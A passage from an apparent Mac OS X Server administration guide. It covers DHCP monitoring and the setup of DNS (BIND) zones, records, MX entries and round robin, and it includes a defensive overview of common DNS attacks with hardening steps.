secondary servers (this is usually the IP address of the DHCP server itself), and the NBT
node type (which is usually “broadcast”). The NBDD Server and the NetBIOS Scope ID
are typically not used, but you may need to use them, depending on your Windows
clients’ configuration, and Windows network infrastructure.
To set WINS options for a subnet:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet and click Edit.
5 Click the WINS tab.
6 Enter the domain name or IP address of the WINS/NBNS primary and secondary servers
for this subnet.
7 Enter the domain name or IP address of the NBDD server for this subnet.
8 Choose the NBT node type from the pop-up menu.
9 Enter the NetBIOS Scope ID.
10 Click Save.
Disabling Subnets Temporarily
You can temporarily shut down a subnet without losing all its settings. This means no
IP addresses from the subnet’s range will be distributed on the selected interface to
any client.
To disable a subnet:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Deselect “Enable” next to the subnet you want to disable.
Monitoring DHCP Service
You’ll need to monitor DHCP service. There are two main ways to monitor DHCP
service. First, you can view the client list; second, you can monitor the log files
generated by the service. You can use the service logs to help troubleshoot network
problems. The following sections discuss these aspects of monitoring DHCP service.
Viewing the DHCP Status Overview
The status overview shows a simple summary of the DHCP service. It shows whether or
not the service is running, how many clients it has, and when service was started. It
also shows how many IP addresses are statically assigned from your subnets and the
last time the client database was updated.
To see the overview:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click the Overview button.
Setting the Log Detail Level for DHCP Service
You can choose the level of detail you want to log for DHCP service.
• “Low (errors only)” will indicate conditions for which you need to take immediate
action (for example, if the DHCP server can’t start up). This level corresponds to
bootpd reporting in “quiet” mode, with the “-q” flag.
• “Medium (errors and warnings)” can alert you to conditions in which data is
inconsistent, but the DHCP server is still able to operate. This level corresponds to
default bootpd reporting.
• “High (all events)” will record all activity by the DHCP service, including routine
functions. This level corresponds to bootpd reporting in “verbose” mode, with the “-v”
flag.
To set up the log detail level:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Choose the logging option you want.
5 Click Save.
Viewing DHCP Log Entries
If you’ve enabled logging for DHCP service, you can check the system log for DHCP
errors.
To see DHCP log entries:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Log.
Viewing the DHCP Client List
The DHCP Clients window gives the following information for each client:
• The IP address served to the client.
• The number of days of lease time left, until the time is less than 24 hours; then the
number of hours and minutes.
• The DHCP client ID. This is usually, but not always, the same as the hardware address.
• The computer name.
• The Ethernet ID.
To view the DHCP client list:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Clients.
Click any column heading to sort the list by different criteria.
Where to Find More Information
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at www.faqs.org/rfcs.
For details about DHCP, see RFC 2131.
For more information on bootpd and its advanced configuration options, see bootpd’s
man page.
2
DNS Service
When your clients want to connect to a network resource such as a web or file server,
they typically request it by its domain name (such as www.example.com) rather than
by its IP address (such as 192.168.12.12). The Domain Name System (DNS) is a distributed
database that maps IP addresses to domain names so your clients can find the
resources by name rather than by numerical address.
A DNS server keeps a list of domain names and the IP addresses associated with each
name. When a computer needs to find the IP address for a name, it sends a message to
the DNS server (also known as a name server). The name server looks up the IP address
and sends it back to the computer. If the name server doesn’t have the IP address
locally, it sends messages to other name servers on the Internet until the IP address is
found.
Setting up and maintaining a DNS server is a complex process. Therefore many
administrators rely on their Internet Service Provider (ISP) for DNS services. In this case,
you only have to configure your network preferences with the name server IP address
provided by your ISP.
If you don’t have an ISP to handle DNS requests for your network and any of the
following is true, you need to set up DNS service:
• You don’t have the option to use DNS from your ISP or other source.
• You plan on making frequent changes to the namespace and want to maintain it
yourself.
• You have a mail server on your network and you have difficulties coordinating with
the ISP that maintains your domain.
Mac OS X Server uses Berkeley Internet Name Domain (BIND v.9.2.2) for its
implementation of DNS protocols. BIND is an open-source implementation and is used
by the majority of name servers on the Internet.
Before You Set Up DNS Service
This section contains information you should consider before setting up DNS on your
network. The issues involved with DNS administration are complex and numerous. You
should only set up DNS service on your network if you’re an experienced DNS
administrator.
You should consider creating a mail account called “hostmaster” that receives mail and
delivers it to the person that runs the DNS server at your site. This allows users and
other DNS administrators to contact you regarding DNS problems.
DNS and BIND
You should have a thorough understanding of DNS before you attempt to set up your
own DNS server. A good source of information about DNS is DNS and BIND, 4th edition,
by Paul Albitz and Cricket Liu (O’Reilly and Associates, 2001).
Note: Apple can help you locate a network consultant to implement your DNS service.
You can contact Apple Professional Services and Apple Consultants Network on the
web at www.apple.com/services/ or www.apple.com/consultants.
Setting Up Multiple Name Servers
You should set up at least one primary and one secondary name server. That way, if the
primary name server unexpectedly shuts down, the secondary name server can
continue to provide service to your users. A secondary server gets its information from
the primary server by periodically copying all the domain information from the primary
server.
Once a name server learns a name/address pair of a host in another domain (outside
the domain it serves), the information is cached, which ensures that IP addresses for
recently resolved names are stored for later use. DNS information is usually cached on
your name server for a set time, referred to as a time-to-live (TTL) value. When the TTL
for a domain name/IP address pair has expired, the entry is deleted from the name
server’s cache and your server will request the information again as needed.
Setting Up DNS Service for the First Time
If you’re using an external DNS name server and you entered its IP address in the Setup
Assistant, you don’t need to do anything else. If you’re setting up your own DNS server,
follow the steps in this section.
Step 1: Register your domain name
Domain name registration is managed by a central organization, the Internet Assigned
Numbers Authority (IANA). IANA registration makes sure domain names are unique
across the Internet. (See www.iana.org for more information.) If you don’t register your
domain name, your network won’t be able to communicate over the Internet.
Once you register a domain name, you can create subdomains within it as long as you
set up a DNS server on your network to keep track of the subdomain names and IP
addresses.
For example, if you register the domain name “example.com,” you could create
subdomains such as “host1.example.com,” “mail.example.com,” or “www.example.com.”
A server in a subdomain could be named “primary.www.example.com,” or
“backup.www.example.com.” The DNS server for example.com keeps track of
information for its subdomains, such as host (or computer) names, static IP addresses,
aliases, and mail exchangers. If your ISP handles your DNS service, you’ll need to inform
them of any changes you make to your namespace, including adding subdomains.
The range of IP addresses for use with a given domain must be clearly defined before
setup. These addresses are used exclusively for one specific domain (never by another
domain or subdomain). The range of addresses should be coordinated with your
network administrator or ISP.
Step 2: Learn and plan
If you’re new to working with DNS, learn and understand DNS concepts, tools, and
features of Mac OS X Server and BIND. See “Where to Find More Information” on
page 41.
Then plan your Domain Name System Service. You may consider the following
questions when planning:
• Do you even need a local DNS server? Does your ISP provide DNS service? Could you
use Rendezvous names instead?
• How many servers will you need for anticipated load? How many servers will you
need for backup purposes? For example, you should designate a second or even
third computer for backup DNS service.
• What is your security strategy to deal with unauthorized use?
• How often should you schedule periodic inspections or tests of the DNS records to
verify data integrity?
• How many services or devices (like an intranet website or a network printer) are
there that will need a name?
• What method should you use to configure DNS?
There are two ways to configure DNS service on Mac OS X Server. The first, and
recommended, way is to use Server Admin to set up DNS service. See “Managing DNS
Service” on page 21 for instructions.
The second way to configure DNS is by editing the BIND configuration file. BIND is the
set of programs used by Mac OS X Server that implements DNS. One of those programs
is the name daemon, or named. To set up and configure BIND, you need to modify the
configuration file and the zone file.
The configuration file is located at:
/etc/named.conf
The zone file name is based on the name of the zone. For example, the zone file for the
zone “example.com” is located at:
/var/named/example.com.zone
See “Configuring BIND Using the Command Line” on page 37 for more information.
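For reference, the two files are tied together by a zone declaration in the configuration file. A minimal sketch of the relevant named.conf fragment (paths and names follow the conventions above, but treat the details as illustrative):

```
// /etc/named.conf (fragment)
options {
    directory "/var/named";        // zone files are resolved relative to this directory
};

zone "example.com" {
    type master;
    file "example.com.zone";       // i.e., /var/named/example.com.zone
};
```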
Step 3: Configure basic DNS settings
See “Managing DNS Service” on page 21 for more information.
Step 4: Create a DNS Zone
Use Server Admin to set up DNS zones. See “Managing Zones” on page 22 for
instructions. After adding a master zone, Server Admin automatically creates an NS
record with the same name as the Source of Authority (SOA).
Step 5: Add Address and additional records to the zone.
Use Server Admin to add additional records to your Zone. Create an Address record for
every computer or device (printer, file server, etc.) that has a static IP address and needs
a name. When you create an A record, you have the option to specify the creation of a
reverse lookup record and its corresponding zone. See “Managing Records” on page 25
for instructions.
Step 6: Set up a mail exchange (MX) record (optional)
If you provide mail service over the Internet, you need to set up an MX record for your
server. See “Setting Up MX Records” on page 33 for more information.
Step 7: Configure the reverse lookup zone (optional)
For each zone that you create, Mac OS X Server creates a reverse lookup zone. Reverse
lookup zones translate IP addresses to domain names, the opposite of normal lookups,
which translate domain names to IP addresses. If you did not specify reverse lookup
records when initially creating your A records, you might need to configure your
reverse lookup zone after its creation.
Step 8: Start DNS service
Mac OS X Server includes a simple interface for starting and stopping DNS service.
See “Starting and Stopping DNS Service” on page 21 for more information.
Managing DNS Service
Mac OS X Server provides a simple interface for starting and stopping DNS service as
well as viewing logs and status. Basic DNS settings can be configured with Server
Admin. More advanced features require configuring BIND from the command-line, and
are not covered here.
Starting and Stopping DNS Service
Use this procedure to start or stop DNS service. Remember to restart the DNS service
whenever you make changes to the DNS service in Server Admin.
To start or stop DNS service:
1 In Server Admin, choose DNS from the Computers & Services list.
2 Make sure you have at least one Zone and its reverse lookup zone created and fully
configured.
3 Click Start Service or Stop Service.
The service may take a moment to start (or stop).
Enabling or Disabling Zone Transfers
In the Domain Name System, zone data is replicated among authoritative DNS servers
by means of the “zone transfer.” Secondary DNS servers (“slaves”) use zone transfers to
acquire their data from primary DNS servers (“masters”). Zone transfers must be
enabled to use secondary DNS servers.
To enable or disable zone transfer:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select or deselect Allow Zone Transfers as needed.
Enabling or Disabling Recursion
Recursion is the process of fully resolving domain names into IP addresses. Users’
applications depend on the DNS server to perform this function. Other DNS servers
that query yours don’t have to perform the recursion.
To prevent malicious users from altering the master zone’s records (“cache poisoning”),
or from making unauthorized use of the server for DNS service, you can disable recursion.
However, if you disable it, your own users won’t be able to use your DNS service to look
up any names outside of your zones.
You should only disable recursion if no clients are using this DNS server for name
resolution and no servers are using it for forwarding.
To enable or disable recursion:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select or deselect Allow Recursion as needed.
If you choose to enable recursion, consider disabling it for external IP addresses, but
enabling it for LAN IP addresses, by editing BIND’s named.conf file. See BIND’s
documentation for more information.
Managing Zones
Zones are the basic organizational unit of the Domain Name System. Zones contain
records and are defined by how they acquire those records, and how they respond to
DNS requests. There are three kinds of zones:
Master
A master zone has the master copy of the zone’s records, and provides authoritative
answers to lookup requests.
Slave
A slave zone is a copy of a master zone stored on a slave or secondary name server.
Each slave zone keeps a list of masters that it contacts to receive updates to records in
the master zone. Slaves must be configured to request the copy of the master zone’s
data. Slave zones use zone transfers to get copies of the master zone data. Slave name
servers can answer lookup requests just as master servers do. By using several slave zones linked
to one master, you can distribute DNS query loads across several computers and ensure
lookup requests are answered when the master name server is down.
Slave zones also have a refresh interval, which determines how often slave zones check
for changes from the master zone. You can change the zone refresh interval in
BIND’s configuration file. See BIND’s documentation for more information.
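If you configure BIND directly, a slave zone is declared in named.conf with the list of master servers it pulls from; the refresh interval itself is taken from the master zone's SOA record. A hypothetical fragment (the address is an example):

```
zone "example.com" {
    type slave;
    file "backups/example.com.zone";   // local copy of the transferred zone data
    masters { 192.168.1.2; };          // master server(s) to request zone transfers from
};
```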
Forward
A forward zone directs all lookup requests for that zone to other DNS servers. Forward
zones don’t do zone transfers. Often, forward zone servers are used to provide DNS
services to a private network behind a firewall. In this case, the DNS server must have
access to the Internet and a DNS server outside the firewall.
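In named.conf terms, a forward zone declaration might be sketched as follows (the address stands in for a DNS server outside the firewall):

```
zone "example.com" {
    type forward;
    forward only;                   // forward all queries; don't fall back to iterative resolution
    forwarders { 203.0.113.53; };   // example external DNS server
};
```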
Adding a Master Zone
A master zone has the master copy of the zone’s records and provides authoritative
answers to lookup requests. After adding a master zone, Server Admin automatically
creates an NS record with the same name as the Source of Authority (SOA).
To add a master zone:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click Add beneath the Zones list.
5 Enter a zone name.
The zone name must have a trailing period: “example.com.”
6 Choose Master from the Zone Type pop-up menu.
7 Enter the hostname of the domain’s SOA.
If this computer will be the authoritative name server for the domain, enter the
computer’s hostname (with a trailing period). For example, “ns.example.com.”
8 Enter the email address of the zone’s administrator.
In the email address, replace the “@” with a period, and add a trailing period. For
example, the email address “[email protected]” should be entered as
“admin.example.com.” (Remember to include the trailing period.)
9 Click OK and then click Save.
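In zone-file terms, the SOA hostname and the converted administrator address appear side by side in the SOA record; a sketch using the example values above (the timing fields are omitted here):

```
example.com.  IN  SOA  ns.example.com.  admin.example.com.  (
                  ; serial, refresh, retry, expire, and TTL values follow
)
```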
Adding a Slave Zone
A slave zone is a copy of a master zone stored on a slave or secondary name server.
Slaves must be configured to request the copy of the master zone’s data. Slave zones
use zone transfers to get copies of the master zone data.
To add a slave zone:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click Add beneath the Zones list.
5 Enter a zone name.
The Zone name must have a trailing period: “example.com.”
6 Choose Slave from the Zone Type pop-up menu.
7 Click OK.
8 Click Add under the “Master servers for backup” pane.
9 Enter the IP addresses for the master servers for this zone.
10 Click Save.
Adding a Forward Zone
A forward zone directs all lookup requests to other DNS servers.
To add a forward zone:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click Add beneath the Zones list.
5 Enter a zone name.
The Zone name must have a trailing period: “example.com.”
6 Choose the Forward zone type from the Zone Type pop-up menu.
7 Click OK.
8 Click Add under the “Forward servers for fwd” pane.
9 Enter the IP addresses of the DNS servers that lookup requests will be forwarded to.
10 Click Save.
Duplicating a Zone
You can create a copy of an existing zone on the same computer. You could use this to
speed up configuration of multiple zones.
To duplicate a zone:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click the Duplicate button beneath the Zones list.
5 If desired, double-click the newly duplicated zone to change the zone name, SOA or
administrator email address.
6 Click Save.
Modifying a Zone
This section describes modifying a zone’s type and settings but not modifying the
records within a zone. You may need to change a zone’s administrator address, type, or
domain name.
To modify a zone:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click the Edit button beneath the Zones list.
5 Change the zone name, type, or administrator email address as needed.
For more information on zone types, see “Managing Zones” on page 22.
6 Click OK, and click Save.
Deleting a Zone
This section describes how to delete an existing zone. Deleting a zone removes the zone and all the
records associated with it.
To delete a zone:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click the Delete button beneath the Zones list.
5 Click Save to confirm the deletion.
Managing Records
Each zone contains a number of records. These records are requested when a client
computer needs to translate a domain name (like www.example.com) to an IP number.
Web browsers, email clients, and other network applications rely on a zone’s records to
contact the appropriate server.
The master zone’s records will be queried by others across the Internet so they can
connect to your network services. There are several kinds of DNS records. The records
which are available for configuration by Server Admin’s user interface are:
• Address (A): Stores the IP address associated with a domain name.
• Canonical Name (CNAME): Stores the “real name” of a server when given a “nickname”
or alias. For example, mail.apple.com might have a canonical name of
MailSrv473.apple.com.
• Mail Exchanger (MX): Stores the domain name of the computer that is used for email
in a zone.
• Name Server (NS): Stores the authoritative name server for a given zone.
• Pointer (PTR): Stores the domain name of a given IP address (reverse lookup).
• Text (TXT): Stores a text string as a response to a DNS query.
If you need access to other kinds of records, you’ll need to edit BIND’s configuration
files manually. Please see BIND’s documentation for details.
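As a point of reference, these record types take forms like the following in a zone data file (all names and addresses are illustrative only):

```
example.com.               IN  NS     ns.example.com.        ; name server for the zone
ns.example.com.            IN  A      192.168.1.2            ; address record
www.example.com.           IN  CNAME  server1.example.com.   ; alias pointing to the real name
example.com.               IN  MX     10 mail.example.com.   ; mail exchanger, priority 10
2.1.168.192.in-addr.arpa.  IN  PTR    ns.example.com.        ; reverse lookup for 192.168.1.2
example.com.               IN  TXT    "An example text record"
```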
Adding a Record to a Zone
You need to add records for each domain name (example.com) and subdomain name
(machine.example.com) for which the DNS master zone has responsibility. You should
not add records for domain names that this zone doesn’t control.
To add a record:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone to which this record will be added.
5 Click the Add button beneath the Records list.
6 Select a record type from the Type pop-up menu.
7 In the first field, enter the fully qualified domain name.
The domain name must have a trailing period: “example.com.”
If you’re creating a PTR record, enter the IP address instead.
If you’re creating a TXT record, enter the text string you want.
8 In the second field, for the following record types, enter:
• A records: the IP address.
• AAAA records: the IPv6 address.
• CNAME records: the real name of the computer.
• MX records: the name (with trailing period) or IP address of the domain’s mail
exchanger.
• PTR records: the full domain name with trailing period.
9 If creating an A record, select “Create reverse mapping record” to automatically create
its corresponding PTR record.
10 Click OK, and click Save.
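In zone-file terms, the “Create reverse mapping record” option pairs the A record with a PTR record in the reverse lookup zone, roughly like this (names and addresses are examples):

```
; in the forward zone, example.com
host1.example.com.          IN  A    192.168.1.10

; in the reverse lookup zone, 1.168.192.in-addr.arpa
10.1.168.192.in-addr.arpa.  IN  PTR  host1.example.com.
```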
Modifying a Record in a Zone
If you make frequent changes to the namespace for the domain, you’ll need to update
the DNS records as often as the namespace changes. Upgrading hardware or adding
hosts to a domain might require updating the DNS records as well.
To modify a record:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone in which this record will be modified.
5 Double-click the record to be modified, or select the record and click the Edit button.
6 Modify the record as needed.
You can change the hostname, record type, or IP number.
7 Click OK.
Deleting a Record From a Zone
You should delete records whenever a domain name is no longer associated with a
working address.
To delete a record:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the zone from which this record will be deleted.
5 Select the record to be deleted.
6 Click the Delete button beneath the Records list.
7 Click Save to confirm the deletion.
Monitoring DNS
You may want to monitor DNS status to troubleshoot name resolution problems, check
how often the DNS service is used, or even check for unauthorized or malicious DNS
service use. This section discusses common monitoring tasks for DNS service.
Viewing DNS Service Status
You can check the DNS Status window to see:
• Whether the service is running.
• The version of BIND (the underlying software for DNS) that is running.
• When the service was started and stopped.
• The number of zones allocated.
To view DNS service status:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click the Overview button for general DNS service information.
Viewing DNS Service Activity
You can check the DNS Status window to see:
• The number of transfers running and deferred.
• Whether the service is loading the configuration file.
• If the service is priming.
• Whether query logging is turned on or off.
• The number of Start of Authority (SOA) queries in progress.
To view DNS service activity:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Activity to view operations currently in progress.
Viewing DNS Log Entries
DNS service creates entries in the system log for error and alert messages.
To see DNS log entries:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Log.
Changing DNS Log Detail Levels
You can change the detail level of the DNS service log. You may want a highly detailed
log for debugging, or a less detailed log that only shows critical warnings.
To change the log detail level:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Choose the detail level from the Log Level pop-up menu.
The possible log levels are:
• Critical (less detailed)
• Error
• Warning
• Notice
• Information
• Debug (most detailed)
Changing DNS Log File Location
You can change the location of the DNS service log. You may want to put it somewhere
other than the default path.
To change the log file location:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Enter the desired file path for the DNS service log, or select a path using
the Browse button.
If no path is entered, the default location is /var/logs/.
Viewing DNS Usage Statistics
You can check the DNS Statistics window to see statistics on common DNS queries.
Some common DNS queries begin with the following:
• Name Server (NS): Asks for the authoritative name server for a given zone.
• Address (A): Asks for the IP address associated with a domain name.
• Canonical Name (CName): Asks for the “real name” of a server when given a
“nickname” or alias. For example, mail.apple.com might have a canonical name of
MailSrv473.apple.com.
• Pointer (PTR): Asks for the domain name of a given IP address (reverse lookup).
• Mail Exchanger (MX): Asks which computer in a zone is used for email.
• Start Of Authority (SOA): Asks for name server information shared with other name
servers and possibly the email address of the technical contact for this name server.
• Text (TXT): Asks for text records used by the administrator.
To see DNS usage statistics:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Activity to view operations currently in progress and usage statistics.
Securing the DNS Server
DNS servers, like other legitimate Internet servers, are targeted by malicious computer
users (commonly called “hackers”). There are several kinds of attacks that DNS
servers are susceptible to. By taking extra precautions, you can prevent the problems
and downtime associated with malicious users. The kinds of security attacks
associated with DNS service are:
• DNS Spoofing.
• Server Mining.
• DNS Service Profiling.
• Denial-of-Service (DoS).
• Service Piggybacking.
DNS Spoofing
DNS spoofing is the insertion of false data into the DNS server’s cache. This allows hackers to do
any of the following:
• Redirect real domain name queries to alternative IP Addresses.
For example, a falsified A record for a bank could point a computer user’s browser to
a different IP address that is controlled by the hacker. A duplicate website could then
fool users into unintentionally giving their bank account numbers and passwords to
the hacker.
Also, a falsified mail record could allow a hacker to intercept mail sent to or from a
domain. If the hacker also forwards those emails to the correct mail server after
copying them, this can go undetected indefinitely.
• Prevent proper domain name resolution and access to the Internet.
This is the most benign of DNS spoof attacks. It merely makes a DNS server appear to
be malfunctioning.
The most effective method to guard against these attacks is vigilance. This includes
maintaining up-to-date software as well as auditing your DNS records regularly. As
exploits are found in the current version of BIND, they are patched and a Security
Update is made available for Mac OS X Server. Apply all such security patches. Regular
audits of your DNS records are also valuable in preventing these attacks.
Server Mining
Server mining is the practice of getting a copy of a complete master zone by
requesting a zone transfer. In this case, a hacker pretends to be a slave server and
requests a copy of all of the master zone’s records.
With a copy of your master zone, the hacker can see what kinds of services a domain
offers, and the IP address of the servers that offer them. He or she can then try specific
attacks based on those services. This is reconnaissance before another attack.
To defend against this attack, you need to specify which IP addresses are allowed to
request zone transfers (your slave zone servers) and disallow all others. Zone transfers
are accomplished over TCP on port 53. Limit zone transfers by
blocking zone transfer requests from anyone but your slave DNS servers.
To specify zone transfer IP addresses:
m Create a firewall filter that allows only IP addresses inside your firewall to access TCP
port 53.
Follow the instructions in “Creating an Advanced IP Filter for TCP ports” in Chapter 3, “IP
Firewall Service.” Use the following settings:
• Allow packet.
• Port 53.
• TCP protocol.
• Source IP is the IP address of your slave DNS server.
• Destination IP is the IP address of your master DNS server.
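If you configure BIND directly, the same restriction can also be expressed with the allow-transfer option in named.conf. A hypothetical fragment, where the address stands in for your slave DNS server:

```
options {
    allow-transfer { 192.168.1.3; };   // only this slave server may request zone transfers
};
```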
DNS Service Profiling
Another common reconnaissance technique used by malicious users is to profile your
DNS Service. First a hacker makes a BIND version request. The server will report what
version of BIND is running. He or she then compares the response to known exploits
and vulnerabilities for that version of BIND.
To defend against this attack, you can configure BIND to respond with something other
than what it is.
To alter BIND’s version response:
1 Launch a command-line text editor (like vi, emacs, or pico).
2 Open named.conf for editing.
3 Add the following to the “options” brackets of the configuration file.
version "[your text, for example: we're not telling!]";
4 Save the config file.
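In context, the directive sits inside the options block of named.conf; a sketch (the version text is only an example):

```
options {
    version "we're not telling!";   // reported in place of the real BIND version number
};
```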
Denial-of-Service (DoS)
This kind of attack is very common and easy to carry out. A hacker sends so many service
requests and queries that a server uses all of its processing power and network
bandwidth trying to respond. The hacker prevents legitimate use of the service by
overloading it.
It is difficult to prevent this type of attack before it begins. Constant monitoring of the
DNS service and server load allows an administrator to catch the attack early and
mitigate its damaging effect.
The easiest way to guard against this attack is to block the offending IP address with
your firewall. See “Creating an Advanced IP Filter for TCP ports” on page 51.
Unfortunately, this means the attack is already underway and the hacker’s queries are
being answered and the activity logged.
Service Piggybacking
This attack is not often done by hackers, but by ordinary Internet users. They may feel
that the DNS response time with their own Internet Service Provider is too slow. Having
learned this trick from other users, they configure their computers to query
another DNS server instead of their own ISP’s DNS servers. Effectively, more users
access the DNS server than were planned for.
You can guard against this by limiting or disabling DNS Recursion. If you plan to offer
DNS service to your own LAN users, they need recursion to resolve domain names, but
you don’t want to provide this service to any Internet users.
To prevent recursion entirely, see “Enabling or Disabling Recursion” on page 21.
The most common balance is allowing recursion for requests coming from IP addresses
within your own range, but denying recursion to external addresses. BIND allows you to
specify this in its configuration file, named.conf. Edit your named.conf file to include the
following:
options {
...
allow-recursion{
127.0.0.0/8;
[your internal IP range of addresses, like 192.168.1.0/27];
};
};
Please see BIND’s documentation for further information.
Common Network Administration Tasks That Use
DNS Service
The following sections illustrate some common network administration tasks that
require DNS service.
Setting Up MX Records
If you plan to provide mail service on your network, you must set up DNS so that
incoming mail is sent to the appropriate mail host on your network. When you set up
mail service, you define a series of hosts, known as mail exchangers or MX hosts, with
different priorities. The host with the highest priority (the lowest priority number) gets
the mail first. If that host is unavailable, the host with the next highest priority gets the
mail, and so on.
For example, let’s say the mail server’s host name is “reliable” in the “example.com”
domain. Without an MX record, the users’ mail addresses would include the name of
your mail server computer, like this:
[email protected]
If you want to change the mail server or redirect mail, you must notify potential
senders of a new address for your users. Or, you can create an MX record for each
domain that you want handled by your mail server and direct the mail to the correct
computer.
When you set up an MX record, you should include a list of all possible computers that
can receive mail for a domain. That way, if the server is busy or down, mail is sent to
another computer. Each computer on the list is assigned a priority number. The one
with the lowest number is tried first. If that computer isn’t available, the computer with
the next lowest number is tried, and so on. If a backup computer receives the mail, it
holds the mail and forwards it to the main mail server when the main server becomes
available, and the main server then delivers the mail. A sample list might look like this:
example.com
10 reliable.example.com
20 our-backup.example.com
30 last-resort.example.com
MX records are used for outgoing mail, too. When your mail server sends mail, it looks
at the MX records to see whether the destination is local or somewhere else on the
Internet. Then the same process happens in reverse. If the main server at the
destination is not available, your mail server tries every available computer on that
destination’s MX record list, until it finds one that will accept the mail.
Note: If you don’t enter the MX information into your DNS server correctly, mail won’t
work.
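In a zone data file, the sample list above corresponds to MX records like these:

```
example.com.  IN  MX  10  reliable.example.com.
example.com.  IN  MX  20  our-backup.example.com.
example.com.  IN  MX  30  last-resort.example.com.
```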
Configuring DNS for Mail Service
Configuring DNS for mail service means enabling Mail Exchange (MX) records on your own
DNS server. If you have an Internet Service Provider (ISP) that provides you with DNS
service, you’ll need to contact the ISP so that they can enable your MX records. Only
follow these steps if you provide your own DNS Service.
To enable MX records:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone you want to use.
5 Click the Add button under the Records pane.
6 Choose MX from the Type pop-up menu.
7 Enter the domain name (like “example.com.”) in the From field.
8 Enter the name of the mail server (like “mail.example.com.”) in the To field.
9 Enter a precedence number.
10 Click OK.
Enabling Redundant Mail Servers
You may need to set up multiple servers for redundancy. If this is the case, you’ll need
to add additional information to each MX record. Create one record for each auxiliary
server. This consists of two steps:
These instructions assume you have an existing MX record for a primary mail server. If
not, please see “Configuring DNS for Mail Service” on page 34.
Step 1: Edit the MX record of the primary mail server
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone you want to use.
5 Click the primary mail server’s MX record in the Records pane.
6 Click the Edit button below the Records pane.
7 Enter a low precedence number for that server.
A lower number indicates it will be chosen first, if available, to receive mail.
8 Click OK.
9 Proceed to Step 2.
Step 2: Create records and priorities for the auxiliary mail servers
These instructions assume you have edited the original MX record. If not, please do so
before proceeding.
These instructions also assume you have already set up and configured one or more
auxiliary mail servers.
To enable backup or redundant mail servers:
1 In Server Admin, select DNS in the Computers & Services pane.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone you want to use.
5 Click the Add button under the Records pane.
6 Choose MX from the Type pop-up menu.
7 Enter the domain name (like ‘example.com.’) in the From field.
8 Enter the name of the mail server (like ‘backup.example.com.’) in the To field.
9 Enter a precedence number for that server which is higher than that of the primary
server.
A higher number indicates it will be chosen if the primary server is unavailable.
10 Click OK.
Setting Up Namespace Behind a NAT Router
If you’re behind a Network Address Translation (NAT) router, you have a special set of IP
addresses that are only usable within the NAT environment. If you were to assign a
domain name to these addresses outside of the NAT router, none of your domain
names would resolve to the correct computer. See Chapter 4, “NAT Service,” on page 67
for more information about NAT.
You can, however, run a DNS service behind the router, assigning host names to the
NAT IP addresses. This way, if you’re behind the NAT router, you can enter domain
names rather than IP addresses to access servers, services, and workstations. Your DNS
server should also have a Forwarding zone to send DNS requests outside of the NAT
router to allow resolution of names outside the routed area. Your clients’ networking
settings should specify the DNS server behind the NAT router. The process of setting up
one of these networks is the same as setting up a private network. See “Setting Up a
Private TCP/IP Network” on page 36 for more information.
If you choose to do this, names entered by users outside the NAT router won’t resolve
to the addresses behind it. You should set the DNS records outside the NAT-routed area
to point to the NAT router, and use NAT port forwarding to access computers behind
the NAT router. For more information on port forwarding, see Chapter 4, “NAT Service,”
on page 67.
Mac OS X’s Rendezvous feature allows you to use hostnames on your local subnet that
end with the “.local” suffix without having to enable DNS. Any service or device that
supports Rendezvous allows the use of user-defined namespace on your local subnet
without setting up and configuring DNS.
Network Load Distribution (aka Round Robin)
BIND allows for simple load distribution using an address-shuffling method called
round robin. You set up a pool of IP addresses for several hosts mirroring the same
content, and BIND cycles the order of these addresses as it responds to queries. Round
robin has no capability to monitor current server load or processing power. It simply
cycles the order of an address list for a given host name.
You enable round robin by adding multiple address entries in your zone data file for a
given host. For example, suppose you want to distribute web server traffic between
three servers on your network that all mirror the same content. Suppose the servers
have the IP addresses 192.168.12.12, 192.168.12.13, and 192.168.12.14. You would add these
lines to the zone data file db.example.com:
www.example.com    60    IN    A    192.168.12.12
www.example.com    60    IN    A    192.168.12.13
www.example.com    60    IN    A    192.168.12.14
When BIND encounters multiple entries for one host, its default behavior is to answer
queries by sending out this list in a cycled order. The first request gets the addresses in
the order A, B, C. The next request gets the order B, C, A, then C, A, B, and so on. Notice
that the time-to-live (TTL) in the second column is set quite short to mitigate the effects
of local caching.
